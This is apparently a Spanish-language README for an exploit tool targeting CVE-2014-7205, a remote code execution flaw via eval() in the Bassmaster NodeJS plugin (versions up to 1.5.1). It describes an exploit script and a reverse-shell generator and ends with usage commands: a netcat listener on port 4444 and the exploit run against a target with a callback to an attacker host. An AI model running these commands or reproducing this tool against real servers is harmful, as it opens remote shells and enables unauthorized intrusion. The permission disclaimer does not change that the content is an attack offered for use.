
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: Un script en Python para explotar CVE-2014-7205. nodeshell.py: Un módulo Python para generar una reverse shell para NodeJS
!!Úselo solo contra servidores en los que tenga permiso para realizar pruebas
CVE-2014-7205 es una vulnerabilidad de Ejecución Remota de Código en el Plugin Bassmaster para NodeJS. Todas las versiones <= 1.5.1 están afectadas. La vulnerabilidad existe dentro del archivo lib/batch.js en la función internals.batch donde una llamada a eval() utiliza entrada de usuario escapada de forma incorrecta (básicamente, la expresión regular no verifica si las solicitudes contienen código malicioso).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444